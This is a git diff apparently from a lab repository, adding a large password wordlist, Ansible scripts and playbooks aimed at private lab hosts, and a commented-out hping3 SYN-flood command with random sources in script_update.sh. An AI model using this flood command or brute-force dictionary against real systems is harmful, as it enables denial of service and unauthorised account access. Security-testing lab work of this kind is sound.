+slayer +scott +2222 +asdf +video +london +7777 +marlboro +srinivas +internet +action +carter +jasper +monster +teresa +jeremy +11111111 +bill +crystal +peter +pussies +cock +beer +rocket +theman +oliver +prince +beach +amateur +7777777 +muffin +redsox +star +testing +shannon +murphy +frank +hannah +dave +eagle1 +11111 +mother +nathan +raiders +steve +forever +angela +viper +ou812 +jake +lovers +suckit +gregory +buddy +whatever +young +nicholas +lucky +helpme +jackie +monica +midnight +college +baby +cunt +brian +mark +startrek +sierra +leather +232323 +4444 +beavis +bigcock +happy +sophie +ladies +naughty +giants +booty +blonde +fucked +golden +0 +fire +sandra +pookie +packers +einstein +dolphins +0 +chevy +winston +warrior +sammy +slut +8675309 +zxcvbnm +nipples +power +victoria +asdfgh +vagina +toyota +travis +hotdog +paris +rock +xxxx +extreme +redskins +erotic +dirty +ford +freddy +arsenal +access14 +wolf +nipple +iloveyou +alex +florida +eric +legend +movie +success +rosebud +jaguar +great +cool +cooper +1313 +scorpio +mountain +madison +987654 +brazil +lauren +japan +naked +squirt +stars +apple +alexis +aaaa +bonnie +peaches +jasmine +kevin +matt +qwertyui +danielle +beaver +4321 +4128 +runner +swimming +dolphin +gordon +casper +stupid +shit +saturn +gemini +apples +august +3333 +canada +blazer +cumming +hunting +kitty +rainbow +112233 +arthur +cream +calvin +shaved +surfer +samson +kelly +paul +mine +king +racing +5555 +eagle +hentai +newyork +little +redwings +smith +sticky +cocacola +animal +broncos +private +skippy +marvin +blondes +enjoy +girl +apollo +parker +qwert +time +sydney +women +voodoo +magnum +juice +abgrtyu +777777 +dreams +maxwell +music +rush2112 +russia +scorpion +rebecca +tester +mistress +phantom +billy +6666 +albert +jordyt +dawder +LOL12345 +2251084185 +123456789 +123456 +warcraft +tripp88 +solidussnake +skeaik05 +satanicbible +qwq28xml +punted +poupous +pivskid1912 +palle969 +october87 +nikki11 +nasu159753 +myliuagne +movies +moravanska +mitsuko +lukaluka +loompe +larahornby +lamer +kreten5 +kaka22 +k8f8vt +hahattmm +goldie +gemigencola +eminem +didierdemaeyer +countvon +cocacola97 +canada +buddy123 +bagdad +baba01 +alcatorda2 +acosta90 +aaparken42 +aaparken +Fingerweg +DylanandAdam +950380 +2406923269 +22042009 +1994kp +124050 +123windi +123456789m +123321 +12345 +abc123 +password +computer +123456 +tigger +1234 +a1b2c3 +qwerty +123 +xxx +money +test +carmen +mickey +secret +summer +internet +service + +canada +hello +ranger +shadow +baseball +donald +harley +hockey +letmein +maggie +mike +mustang +snoopy +buster +dragon +jordan +michael +michelle +mindy +patrick +123abc +andrew +bear +calvin +changeme +diamond +fuckme +fuckyou +matthew +miller +ou812 +tiger +trustno1 +12345678 +alex +apple +avalon +brandy +chelsea +coffee +dave +falcon +freedom +gandalf +golf +green +helpme +linda +magic +merlin +molson +newyork +soccer +thomas +wizard +Monday +asdfgh +bandit +batman +boris +butthead +dorothy +eeyore +fishing +football +george +happy +iloveyou +jennifer +jonathan +love +marina +master +missy +monday +monkey +natasha +ncc1701 +newpass +pamela +pepper +piglet +poohbear +pookie +rabbit +rachel +rocket +rose +smile +sparky +spring +steven +success +sunshine +thx1138 +victoria +whatever +zapata +1 +8675309 +Internet +amanda +andy +angel +august +barney +biteme +boomer +brian +casey +coke +cowboy +delta +doctor +fisher +foobar +island +john +joshua +karen +marley +orange +please +rascal +richard +sarah +scooter +shalom +silver +skippy +stanley +taylor +welcome +zephyr +111111 +1928 +aaaaaa +abc +access +albert +alexander +andrea +anna +anthony +asdfjkl; +ashley +basf +basketball +beavis +black +bob +booboo +bradley +brandon +buddy +caitlin +camaro +charlie +chicken +chris +cindy +cricket +dakota +dallas +daniel +david +debbie +dolphin +elephant +emily +fish +fred +friend +fucker +ginger +goodluck +hammer +heather +help +iceman +jason +jessica +jesus +joseph +jupiter +justin +kevin +knight +lacrosse +lakers +lizard +madison +mary +mother +muffin +murphy +ncc1701d +newuser +nirvana +none +paris +pat +pentium +phoenix +picture +rainbow +sandy +saturn +scott +shannon +shithead +skeeter +sophie +special +stephanie +stephen +steve +sweetie +teacher +tennis +test123 +tommy +topgun +tristan +wally +william +wilson +1q2w3e +654321 +666666 +777 +a12345 +a1b2c3d4 +alpha +amber +angela +angie +archie +asdf +blazer +bond007 +booger +charles +christin +claire +control +danny +david1 +dennis +digital +disney +dog +duck +duke +edward +elvis +felix +flipper +floyd +franklin +frodo +guest +honda +horses +hunter +indigo +info +james +jasper +jeremy +joe +julian +kelsey +killer +kingfish +lauren +marie +maryjane +matrix +maverick +mayday +mercury +micro +mitchell +morgan +mountain +niners +nothing +oliver +peace +peanut +pearljam +phantom +popcorn +princess +psycho +pumpkin +purple +randy +rebecca +reddog +robert +rocky +roses +salmon +sam +samson +sharon +sierra +smokey +startrek +steelers +stimpy +sunflower +superman +support +sydney +techno +telecom +test1 +walter +willie +willow +winner +ziggy +zxcvbnm +7777 +OU812 +a +absolut +alaska +alexis +alice +animal +apples +babylon5 +backup +barbara +benjamin +bill +billy +bird33 +blue +bluebird +bobby +bonnie +bubba +camera +chocolate +clark +claudia +cocacola +compton +connect +cookie +cruise +deliver +douglas +dreamer +dreams +duckie +eagles +eddie +einstein +enter +explorer +faith +family +ferrari +fire +flamingo +flip +flower +foxtrot +francis +freddy +friday +froggy +galileo +giants +gizmo +global +goofy +gopher +hansolo +happy1 +hendrix +henry +herman +homer +honey +house +houston +iguana +indiana +insane +inside +irish +ironman +jake +jane +jasmin +jeanne +jerry +jim +joey +justice +katherine +kermit +kitty +koala +larry +leslie +logan +lucky +mark +martin +matt +minnie +misty +mitch +mom +mouse +nancy +nascar +nelson +netware +pantera +parker +passwd +penguin +peter +phil +phish +piano +pizza +porsche911 +prince +punkin +pyramid +rain +raymond +red +robin +roger +rosebud +route66 +royal +running +sadie +sasha +security +sergei +sheena +sheila +skiing +snapple +snowball +sparrow +spencer +spike +star +stealth +student +sun +sunny +sylvia +tamara +taurus +tech +teresa +theresa +thunderbird +tigers +tony +toyota +training +travel +truck +tuesday +victory +video +viper1 +volvo +wesley +whisky +winnie +winter +wolves +xyz123 +zorro +!@#$% +007 +123123 +1234567 +1969 +5683 +696969 +888888 +Anthony +Bond007 +Friday +Hendrix +Joshua +Matthew +October +Taurus +Tigger +aaa +aaron +abby +abcdef +adidas +adrian +alexandr +alfred +arthur +athena +austin +awesome +badger +bamboo +beagle +bears +beatles +beautiful +beaver +benny +bigmac +bingo +bitch +blonde +boogie +boston +brenda +bright +bubba1 +bubbles +buffy +button +buttons +cactus +candy +captain +carlos +caroline +carrie +casper +catalog +catch22 +challenge +chance +charity +charlotte +cheese +cheryl +chloe +chris1 +clancy +clipper +coltrane +compaq +conrad +cooper +cooter +copper +cosmos +cougar +cracker +crawford +crystal +curtis +cyclone +cyrano +dan +dance +dawn +dean +deutsch +diablo +dilbert +dollars +dookie +doom +dumbass +dundee +e-mail +elizabeth +eric +europe +export +farmer +firebird +fletcher +fluffy +ford +fountain +fox +france +freak1 +friends +frog +fuckoff +gabriel +gabriell +galaxy +gambit +garden +garfield +garlic +garnet +genesis +genius +godzilla +goforit +golfer +goober +grace +grateful +greenday +groovy +grover +guitar +hacker +harry +hazel +hector +herbert +hoops +horizon +hornet +howard +icecream +imagine +impala +informix +jack +janice +jasmine +jason1 +jeanette +jeffrey +jenifer +jenni +jesus1 +jewels +joker +julie +julie1 +junior +justin1 +kathleen +keith +kelly +kelly1 +kennedy +kevin1 +knicks +lady +larry1 +ledzep +lee +leonard +lestat +library +lincoln +lionking +london +louise +lucky1 +lucy +maddog +mailman +majordomo +mantra +margaret +mariposa +market +marlboro +martin1 +marty +master1 +mazda1 +mensuck +mercedes +metal +metallic +midori +mikey +millie +mirage +mmm +molly +monet +money1 +monica +monopoly +mookie +moose +moroni +music +naomi +nathan +ncc1701e +nesbitt +news +nguyen +nicholas +nicole +nimrod +october +olive +olivia +one +online +open +oscar +oxford +pacific +painter +peaches +penelope +pepsi +pete +petunia +philip +phoenix1 +photo +pickle +player +poiuyt +porsche +porter +ppp +puppy +python +quality +quest +raquel +raven +remember +republic +research +robbie +robert1 +roman +rugby +runner +russell +ryan +sailing +sailor +samantha +savage +sbdc +scarlett +school +sean +seven +shadow1 +sheba +shelby +shit +shoes +simba +simple +skipper +smiley +snake +snickers +sniper +snoopdog +snowman +sonic +spitfire +sprite +spunky +starwars +station +stella +stingray +storm +stormy +stupid +sumuinen +sunny1 +sunrise +supra +surfer +susan +tammy +tango +tanya +tara +teddy1 +temp +testing +theboss +theking +thumper +tina +tintin +tomcat +trebor +trek +trevor +tweety +unicorn +valentine +valerie +vanilla +veronica +victor +vincent +viper +warrior +warriors +weasel +wheels +wilbur +winston +wisdom +wombat +xanadu +xavier +xxxx +yellow +zaphod +zeppelin +zeus +!@#$%^ +!@#$%^&* +* +0007 +1022 +10sne1 +1111 +1212 +1911 +1948 +1973 +1978 +1996 +1p2o3i +2000 +2222 +3bears +5252 +Andrew +Broadway +Champs +Family +Fisher +Friends +Jeanne +Killer +Knight +Master +Michael +Michelle +Pentium +Pepper +Raistlin +Sierra +Snoopy +Tennis +Tuesday +abacab +abcd +abcd1234 +abcdefg +abigail +account +ace +acropolis +adam +adi +alex1 +alice1 +allison +alpine +amy +anders +andre1 +andrea1 +angel1 +anita +annette +antares +apache +apollo +aragorn +arizona +arnold +arsenal +asdfasdf +asdfg +asdfghjk +avenger +avenir +baby +babydoll +bach +bailey +banana +barry +basil +basket +bass +batman1 +beaner +beast +beatrice +beer +bella +ben +bertha +bigben +bigdog +biggles +bigman +binky +biology +bishop +bliss +blondie +blowfish +bluefish +bmw +bobcat +bosco +boss +braves +brazil +bridges +bruce +bruno +brutus +buck +buffalo +bugsy +bull +bulldog +bullet +bullshit +bunny +business +butch +butler +butter +california +cannondale +canon +carebear +carol +carol1 +carole +cassie +castle +catalina +catherine +catnip +cccccc +celine +center +champion +chanel +chaos +chelsea1 +chester1 +chicago +chico +chip +christian +christy +church +cinder +civil +colleen +colorado +columbia +commander +connie +content +cook +cookies +cooking +cordelia +corona +cowboys +coyote +crack1 +craig +creative +crow +cuddles +cuervo +cutie +cyber +daddy +daisie +daisy +daniel1 +danielle +dark1 +database +davids +deadhead +death +denali +denis +depeche +derek +design +destiny +diana +diane +dickens +dickhead +digger +dodger +don +donna +dougie +draft +dragonfly +dylan +eagle +eclipse +electric +emerald +emmitt +entropy +etoile +excalibur +express +farout +farside +feedback +fender +fidel +fiona +fireman +firenze +fish1 +flash +fletch +florida +flowers +fool +foster +fozzie +francesco +francine +francois +frank +french +fuckface +fun +gargoyle +gasman +gemini +general +gerald +germany +gilbert +goaway +gold +golden +goldfish +goose +gordon +graham +grant +graphic +gregory +gretchen +gunner +hal9000 +hannah +harold +harrison +harvey +hawkeye +heaven +heidi +helen +helena +hell +herzog +hithere +hobbit +huey +ibanez +idontknow +image +integra +intern +intrepid +ireland +irene +isaac +isabel +jackie +jackson +jaguar +jamaica +japan +jeff +jenny1 +jessie +jethrotull +jkl123 +joel +johan +johanna1 +johnny +joker1 +jordan23 +judith +julia +jumanji +jussi +kangaroo +karen1 +kathy +keepout +keith1 +kenneth +kidder +kim +kimberly +king +kingdom +kirk +kitkat +kramer +kris +kristen +lambda +laura +laurie +law +lawrence +lawyer +legend +leon +liberty +light +lindsay +lindsey +lisa +liverpool +logical +lola +lonely +lorrie +louis +lovely +loveme +lucas +m +madonna +mail +major +malcolm +malibu +marathon +marcel +maria1 +mariah +mariah1 +marilyn +mariner +mario +mark1 +marvin +maurice +max +maxine +maxwell +me +media +meggie +melanie +melissa +melody +merlot +mexico +michael1 +michele +midnight +midway +mike1 +miki +mine +miracle +misha +mishka +mmouse +molly1 +monique +montreal +moocow +moon +moore +mopar +morris +mort +mortimer +mouse1 +mulder +nautica +nellie +nermal +new +newton +nicarao +nick +nina +nirvana1 +nissan +norman +notebook +ocean +olivier +ollie +olsen +opera +opus +oranges +oregon +orion +overkill +pacers +packer +panda +pandora +panther +passion +patricia +pearl +peewee +pencil +penny +people +percy +person +peter1 +petey +picard +picasso +pierre +pinkfloyd +pit +plus +polar +polaris +police +polo +pookie1 +poppy +power +predator +preston +primus +prometheus +public +q1w2e3 +queen +queenie +quentin +radio +ralph +random +rangers +raptor +rastafarian +reality +redrum +remote +reptile +reynolds +rhonda +ricardo +ricardo1 +ricky +river +roadrunner +rob +robinhood +robotech +rocknroll +rocky1 +rodeo +rolex +ronald +rouge +roxy +roy +ruby +ruthie +sabrina +sakura +salasana +sally +sampson +samuel +sandra +santa +sapphire +scarecrow +scarlet +scorpio +scott1 +scottie +scout +scruffy +scuba1 +seattle +serena +sergey +shanti +shark +shogun +simon +singer +skibum +skull +skunk +skywalker +slacker +smashing +smiles +snowflake +snowski +snuffy +soccer1 +soleil +sonny +sound +spanky +speedy +spider +spooky +stacey +star69 +start +starter +steven1 +sting1 +stinky +strawberry +stuart +sugar +sunbird +sundance +superfly +suzanne +suzuki +swimmer +swimming +system +taffy +tarzan +tbird +teddy +teddybear +teflon +temporal +terminal +terry +the +theatre +thejudge +thunder +thursday +time +tinker +toby +today +tokyo +tootsie +tornado +tracy +tree +tricia +trident +trojan +trout +truman +trumpet +tucker +turtle +tyler +utopia +vader +val +valhalla +visa +voyager +warcraft +warlock +warren +water +wayne +wendy +williams +willy +win95 +windsurf +winona +wolf +wolf1 +woody +woofwoof +wrangler +wright +www +xcountry +xfiles +xxxxxx +y +yankees +yoda +yukon +yvonne +zebra +zenith +zigzag +zombie +zxc123 +zxcvb +zzz +000000 +007007 +11111 +11111111 +1213 +1214 +1225 +123321 +1313 +1316 +1332 +1412 +1430 +171717 +1818 +181818 +1950 +1952 +1953 +1955 +1956 +1960 +1964 +1975 +1977 +1991 +1a2b3c +1chris +1kitty +1qw23e +2001 +2020 +2112 +22 +2200 +2252 +2kids +3010 +3112 +3141 +333 +3533 +4055 +4444 +4788 +4854 +4runner +5050 +5121 +54321 +55555 +57chevy +6262 +6301 +6969 +7777777 +789456 +7dwarfs +88888888 +Abcdefg +Alexis +Alpha +Animals +Ariel +BOSS +Bailey +Bastard +Beavis +Bismillah +Bonzo +Booboo +Boston +Canucks +Cardinal +Carol +Celtics +ChangeMe +Charlie +Chris +Computer +Cougar +Creative +Curtis +Daniel +Darkman +Denise +Dragon +Eagles +Elizabeth +Esther +Figaro +Fishing +Fortune +Freddy +Front242 +Gandalf +Geronimo +Gingers +Golden +Goober +Gretel +HARLEY +Hacker +Hammer +Harley +Heather +Henry +Hershey +Homer +Jackson +Janet +Jennifer +Jersey +Jessica +Joanna +Johnson +Jordan +KILLER +Katie +Kitten +Liberty +Lindsay +Lizard +Madeline +Margaret +Maxwell +Mellon +Merlot +Metallic +Michel1 +Money +Monster +Montreal +Newton +Nicholas +Noriko +Paladin +Pamela +Password +Peaches +Peanuts +Peter +Phoenix +Piglet +Pookie +Princess +Purple +Rabbit +Raiders +Random +Rebecca +Robert +Russell +Sammy +Saturn +Service +Shadow +Sidekick +Skeeter +Smokey +Sparky +Speedy +Sterling +Steven +Summer +Sunshine +Superman +Sverige +Swoosh +Taylor +Theresa +Thomas +Thunder +Vernon +Victoria +Vincent +Waterloo +Webster +Willow +Winnie +Wolverine +Woodrow +World +aa +aaaa +aardvark +abbott +abcd123 +abcde +accord +active +acura +adg +admin +admin1 +adrock +aerobics +africa +agent +airborne +airwolf +aki123 +alfaro +ali +alicia +alien +aliens +alina +aline +alison +allegro +allen +allstate +aloha +alpha1 +altamira +althea +altima +altima1 +amanda1 +amazing +america +amour +anderson +andre +andrew! +andrew1 +andromed +angels +angie1 +ann +anne +anneli +annie +anything +apple1 +apple2 +applepie +april +aptiva +aqua +aquarius +ariane +ariel +arlene +arrow +artemis +asdf1234 +asdf;lkj +asdfjkl +ashley1 +ashraf +ashton +assmunch +asterix +attila +autumn +avatar +ayelet +aylmer +babes +bambi +baraka +barbie +barn +barney1 +barnyard +barrett +bart +bartman +bball +beaches +beanie +beans +beasty +beauty +beavis1 +bebe +becca +belgium +belize +belle +belmont +benji +benson +beowulf +bernardo +berry +beryl +best +beta +betacam +betsy +betty +bharat +bichon +bigal +bigboss +bigred +biker +bilbo +bills +billy1 +bimmer +bioboy +biochem +birdie +birdy +birthday +biscuit +bitter +biz +blackjack +blah +blanche +blinds +blitz +blood +blowjob +blowme +blueeyes +bluejean +blues +boat +bogart +bogey +bogus +bombay +boobie +boots +bootsie +boulder +bourbon +boxer +boxers +bozo +brain +branch +brandi +brent +brewster +bridge +britain +broker +bronco +bronte +brooke +brother +bryan +bubble +bucks +buddha +budgie +buffett +bugs +bulls +burns +burton +butterfly +buzz +byron +c00per +calendar +calgary +calvin1 +camay +camel +camille +campbell +camping +cancer +canela +cannon +car +carbon +carl +carnage +carolyn +carrot +cascade +cat +catfish +cathy +catwoman +cecile +celica +cement +cessna +chad +chainsaw +chameleon +chang +change +chantal +charger +chat +cherry +chess +chiara +chiefs +china +chinacat +chinook +chouette +chris123 +christ1 +christmas +christopher +chronos +chuck +cicero +cindy1 +cinema +circuit +cirque +cirrus +civic +clapton +clarkson +class +claude +claudel +cleo +cliff +clock +clueless +cobain +cobra +cody +colette +college +color +colors +colt45 +comet +concept +concorde +confused +cool +coolbean +cora +corky +cornflake +corvette +corwin +cosmo +country +courier +cows +crescent +cross +crowley +crusader +cthulhu +cuda +cunningham +cunt +cupcake +current +cutlass +cynthia +daedalus +dagger +dagger1 +daily +dale +dammit +damogran +dana +dancer +daphne +darkstar +darren +darryl +darwin +data1 +datatrain +daytek +dead +deborah +december +decker +deedee +deeznuts +def +delano +delete +demon +denise +denny +desert +deskjet +detroit +devil +devine +devon +dexter +dharma +dianne +diesel +dillweed +dim +dipper +director +disco +dixie +dixon +doc +dodgers +dogbert +doggy +doitnow +dollar +dolly +dominique +domino +dontknow +doogie +doors +dork +doudou +doug +downtown +dragon1 +driver +dude +dudley +dutch +dutchess +dwight +eagle1 +easter +eastern +edith +edmund +effie +eieio +eight +element +elina1 +elissa +ella +ellen +elliot +elsie +empire +engage +enigma +enterprise +eric1 +erin +ernie1 +escort +escort1 +estelle +eugene +evelyn +excel +explore +eyal +faculty +fairview +family1 +fatboy +faust +felipe +fenris +ferguson +ferret +ferris +finance +fireball +first +fishes +fishhead +fishie +flanders +fleurs +flight +florida1 +flowerpot +flute +fly +flyboy +flyer +forward +franka +freddie +frederic +free +freebird +freeman +frisco +fritz +froggie +froggies +frogs +front242 +frontier +fucku +fugazi +funguy +funtime +future +fuzz +gabby +gaby +gaelic +gambler +games +gammaphi +garcia +garfunkel +garth +gary +gaston +gateway +gateway2 +gator1 +george1 +georgia +german +germany1 +getout +ggeorge +ghost +gibbons +gibson +gigi +gilgamesh +giselle +glider1 +gmoney +goat +goblin +goblue +godiva +goethe +gofish +gollum +gone +good +gramps +grandma +gravis +gray +greed +greg +greg1 +gremlin +greta +gretzky +grizzly +grumpy +guess +guido +guitar1 +gumby +gustavo +h2opolo +haggis +haha +hailey +hal +halloween +hallowell +hamid +hamilton +hamlet +hank +hanna +hanson +happy123 +happyday +hardcore +harley1 +haro +harriet +harris +harvard +hawk +hawkeye1 +health +health1 +heart +heather1 +heather2 +hedgehog +heikki +helene +hello1 +hello123 +hello8 +hellohello +help123 +helper +hermes +heythere +highland +hilda +hillary +histoire +history +hitler +hobbes +holiday +holly +homerj +honda1 +hongkong +hoosier +hootie +hope +horse +hosehead +hotrod +huang +hudson +hugh +hugo +hummer +huskies +hydrogen +i +ib6ub9 +idiot +if6was9 +iforget +ilmari +iloveu +impact +indonesia +ingvar +insight +instruct +integral +iomega +irina +iris +irmeli +isabelle +israel +italia +italy +izzy +j0ker +j1l2t3 +jackie1 +jacob +jakey +james1 +jamesbond +jamie +jamjam +jan +jazz +jean +jedi +jeepster +jeffrey1 +jennie +jenny +jensen +jer +jesse +jesse1 +jester +jethro +jetta1 +jimbob +jimi +jimmy +joanie +joanna +joelle +john316 +jordie +jorge +josee +josh +journey +joy +joyce +jubilee +juhani +jules +julia2 +julien +juliet +jumbo +jump +junebug +juniper +justdoit +justice4 +kalamazo +kali +karin +karine +karma +kat +kate +katerina +katie +katie1 +kayla +kcin +keeper +keller +kendall +kenny +kerala +kerrya +ketchup +khan +kids +kings +kissa2 +kissme +kitten +kittycat +kiwi +kkkkkk +kleenex +kombat +kristi +kristine +lab1 +labtec +laddie +ladybug +lamer +lance +laser +laserjet +lassie1 +laurel +lawson +leader +leaf +leblanc +legal +leland +lemon +leo +lester +letter +letters +lev +lexus1 +libra +life +lights +lima +lionel +lions +lissabon +little +liz +lizzy +logger +logos +loislane +loki +lolita +lonestar +longer +longhorn +looney +loren +lori +lorna +loser +lost +lotus +lou +lovers +loveyou +lucia +lucifer +lucky14 +macha +macross +macse30 +maddie +madmax +madoka +magic1 +magnum +maiden +maine +makeitso +mallard +manageme +manson +manuel +marc +marcus +maria +marielle +marine +marino +marshall +mart +martha +math +matti1 +mattingly +maxmax +meatloaf +mech +mechanic +medical +megan +meister +melina +memphis +mercer +merde +mermaid +merrill +miami +michal +michel +michigan +michou +mickel +mickey1 +microsoft +midvale +mikael +milano +miles +millenium +million +minou +miranda +miriam +mission +mmmmmm +mobile +mobydick +modem +mojo +monkey1 +monroe +montana +montana3 +montrose +monty +moomoo +moonbeam +morecats +morpheus +motor +motorola +movies +mowgli +mozart +mulder1 +munchkin +murray +muscle +mustang1 +nadia +nadine +napoleon +nation +national +neil +neko +nesbit +nestle +neutrino +newaccount +newlife +newyork1 +nexus6 +nichole +nicklaus +nightshadow +nightwind +nike +nikita +nikki +nintendo +nisse +nokia +nomore +none1 +nopass +normal +norton +notta1 +nouveau +novell +noway +nugget +number9 +numbers +nurse +nutmeg +oaxaca +obiwan +obsession +ohshit +oicu812 +omega +openup +orchid +oreo +orlando +orville +otter +ozzy +paagal +packard +packers +packrat +paint +paloma +pam +pancake +panic +papa +paradigm +park +parola +parrot +partner +pascal +pass +patches +patriots +paula +pauline +pavel +payton +peach +peanuts +pedro1 +peggy +pekka +perfect +performa +perry +peterk +peterpan +phialpha +philips +phillips +phishy +phone +piano1 +pianoman +pianos +pierce +pigeon +pink +pioneer +pipeline +piper1 +pirate +pisces +plato +play +playboy +pluto +poetic +poetry +pole +pontiac +pookey +pope +popeye +prayer +precious +prelude +premier +print +printing +prof +provider +puddin +pulsar +pussy +pussy1 +pyro +qqq111 +quebec +qwer +qwert +qwerty12 +qwertyui +r0ger +rabbit1 +racer +racerx +rachelle +racoon +radar +rafiki +raleigh +ram +rambo +randy1 +rasta1 +ratio +ravens +redcloud +redfish +redman +redskins +redwing +redwood +reed +reggae +reggie +reliant +rene +renee +renegade +rescue +revolution +rex +reznor +rhino +rhjrjlbk +richard1 +richards +richmond +riley +ripper +ripple +rita +robby +roberts +robocop +robotics +roche +rock +rocket1 +rockie +rockon +roger1 +rogers +roland +rommel +roni +rookie +rootbeer +rosie +rossigno +rufus +rugger +rush +rusty +ruthless +sabbath +sabina +safety +safety1 +saigon +saint +samIam +samiam +sammie +sammy +samsam +sandi +sanjose +saphire +sarah1 +saskia +sassy +satori +saturday +saturn5 +schnapps +science +scooby +scoobydoo +scooter1 +scorpion +scotch +scotty +scouts +scuba +search +secret3 +seeker +seoul +september +server +services +seven7 +sex +sexy +shaggy +shanghai +shanny +shaolin +shasta +shayne +shazam +shelly +shelter +sherry +ship +shirley +shorty +shotgun +sidney +sigmachi +signal +signature +simba1 +simsim +sinatra +sirius +skate +skip +skipper1 +skydive +skyler +slayer +sleepy +slick +slider +slip +smegma +smile1 +smiths +smitty +smoke +smurfy +snakes +snapper +snoop +snow +sober1 +solomon +sonics +sony +sophia +space +sparks +spartan +spazz +sphynx +spike1 +spock +sponge +spoon +spot +sprocket +spurs +squash +stan +starbuck +stargate +starlight +stars +steel +steph1 +stephi +steve1 +stevens +stewart +sting +stivers +stocks +stone +storage +stranger +strat +strato +stretch +strong +stud +student2 +studio +stumpy +sucker +suckme +sue +sultan +summit +sunfire +sunset +super +superstar +surfing +susan1 +susanna +sutton +suzy +swanson +sweden +sweetpea +sweety +swim +switzer +swordfish +system5 +t-bone +tab +tabatha +tacobell +taiwan +talon +tamtam +tanner +tapani +targas +target +tarheel +tasha +tata +tattoo +tazdevil +tequila +terry1 +test2 +test3 +tester +testi +testtest +texas +thankyou +theend +thelorax +thisisit +thompson +thorne +thrasher +tiger2 +tightend +tika +tim +timber +timothy +tinkerbell +tnt +tom +tool +topcat +topher +toshiba +total +toto1 +tototo +toucan +transfer +transit +transport +trapper +trash +travis +tre +treasure +trees +tricky +trish +triton +trombone +trophy +trouble +trucker +tucson +tula +turbo +turbo2 +twins +tyler1 +ultimate +unique +united +unity +unix +upsilon +ursula +user1 +vacation +valley +vampire +vanessa +vedder +velo +venice +venus +vermont +vette +vicki +vicky +victor1 +vikram +vincent1 +violet +violin +virago +virgil +virginia +vision +visual +volcano +volley +voodoo +vortex +waiting +walden +waldo +walleye +wanker +warner +water1 +wayne1 +webmaster +webster +wedge +weezer +wendy1 +western +whale1 +whit +white +whitney +whocares +whoville +wibble +wildcat +will +william1 +wilma +wind +window +winniethepooh +wolfgang +wolverine +wombat1 +wonder +word +world +x-files +x-men +xanth +xxx123 +xxxxxxxx +xyz +yamaha +yankee +yogibear +yolanda +yomama +yvette +zachary +zack +zebras +zepplin +zoltan +zoomer +zxc +zxcvbn +!@#$%^& +00000000 +121212 +1234qwer +123go +131313 +13579 +1701d +21122112 +369 +5555 +80486 +90210 +911 +99999999 +@#$%^& +ABC123 +Abcdef +Asdfgh +Casio +Changeme +FuckYou +Fuckyou +Gizmo +Hello +JSBach +Michel +NCC1701 +PPP +Qwert +Qwerty +Windows +Zxcvb +Zxcvbnm +action +advil +allo +amelie +anaconda +angus +apollo13 +artist +aspen +ass +asshole +ath +benoit +bernard +bernie +bigbird +bird +blizzard +bluesky +bonjour +booster +byteme +caesar +cardinal +carolina +cats +cedic +cesar +chandler +changeit +chapman +charlie1 +chevy +chiquita +chocolat +christia +christoph +classroom +cloclo +coco +corrado +cougars +courtney +dasha +demo +dirk +dolphins +dominic +donkey +doom2 +dusty +e +energy +fearless +fiction +forest +french1 +fubar +gator +gilles +glenn +go +gocougs +good-luck +graymail +guinness +hilbert +hola +home +homebrew +hotdog +indian +jared +jimbo +jkm +johnson +jojo +josie +judy +koko +kristin +lloyd +lorraine +lulu +lynn +m1911a1 +mac +macintosh +mailer +mars +maxime +memory +meow +mimi +mirror +nat +ne1410s +ne1469 +ne14a69 +nebraska +nemesis +network +newcourt +nigel +niki +nite +notused +oatmeal +patton +paul +pedro +planet +players +politics +pomme +portland +praise +property +protel +psalms +qwaszx +raiders +rambo1 +rancid +ruth +sales +salut +scrooge +shawn +shelley +skidoo +softball +spain +speedo +sports +sss +ssssss +steele +steph +stephani +sunday +surf +sylvie +symbol +tiffany +tigre +toronto +trixie +undead +valentin +velvet +viking +walker +watson +young +zhongguo diff --git a/backup_files/run.sh b/backup_files/run.sh new file mode 100755 index 0000000..68a4f91 --- /dev/null +++ b/backup_files/run.sh @@ -0,0 +1,2 @@ +ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass + diff --git a/backup_files/script_update.sh b/backup_files/script_update.sh new file mode 100755 index 0000000..ac263c5 --- /dev/null +++ b/backup_files/script_update.sh @@ -0,0 +1,8 @@ +#!/bin/sh + + +sudo apt-get update -y # To get the latest package lists +#sudo apt install hping3 -y +#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.25.0.2 + + diff --git a/backup_files/second_script.sh b/backup_files/second_script.sh new file mode 100755 index 0000000..655a74c --- /dev/null +++ b/backup_files/second_script.sh @@ -0,0 +1,2 @@ +ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass + diff --git a/backup_files/test.retry b/backup_files/test.retry new file mode 100644 index 0000000..75048d0 --- /dev/null +++ b/backup_files/test.retry @@ -0,0 +1,5 @@ +172.27.0.2 +172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/backup_files/test.yml b/backup_files/test.yml new file mode 100644 index 0000000..4a6c212 --- /dev/null +++ b/backup_files/test.yml @@ -0,0 +1,112 @@ +--- +- hosts: service + remote_user: docker + gather_facts: no + vars: + user: "docker" + + + + tasks: + + + + # make directory + + - name: make dir for data + become: true + file: + path: "/var/lab/playground/playground-readmongo" + state: directory + owner: docker + group: docker + mode: '0777' + + # make another directory + +# - name: make another dir for data +# become: true +# file: +# path: "/home/docker/my_dir" +# state: directory +# owner: docker +# group: docker +# mode: '0777' + + + # pare google.com + +# - name: google.com +# become: yes +# become_user: "{{ user }}" +# command: curl http://www.google.com +# ignore_errors: yes +# register: configwww + +# - name: ls configwww +# debug: var=configwww.stdout_lines + + + # mk dir + +# - name: remove dir +# become: yes +# become_user: "{{ user }}" +# command: rmdir new_dir +# ignore_errors: yes +# register: rmvdir + + +# - name: ls rmvdir +# debug: var=rmvdir.stdout_lines + + + + + # ls -al + + - name: ls -al + become: yes + become_user: "{{ user }}" + command: ls -al #/etc + ignore_errors: yes + register: config + + + - name: ls config + debug: var=config.stdout_lines + + + + # netstat -antlupe + +# - name: netstat +# become: yes +# become_user: "{{ user }}" +# command: netstat -antlupe +# ignore_errors: yes +# register: ant + + + +# - name: ls ant +# debug: var=ant.stdout_lines + + # install hping3 to all + +# - name: install hping3 to all +# become: yes +# become_user: "{{ user }}" +# command: sudo apt install hping3 -y +# ignore_errors: yes +# register: install_hp3 + +# - name: ls install_hp3 +# debug: var=install_hp3.stdout_lines + + + + - name: Refresh connection + meta: clear_host_errors + + diff --git a/backup_files/test2.retry b/backup_files/test2.retry new file mode 100644 index 0000000..db790ad --- /dev/null +++ b/backup_files/test2.retry @@ -0,0 +1,4 @@ 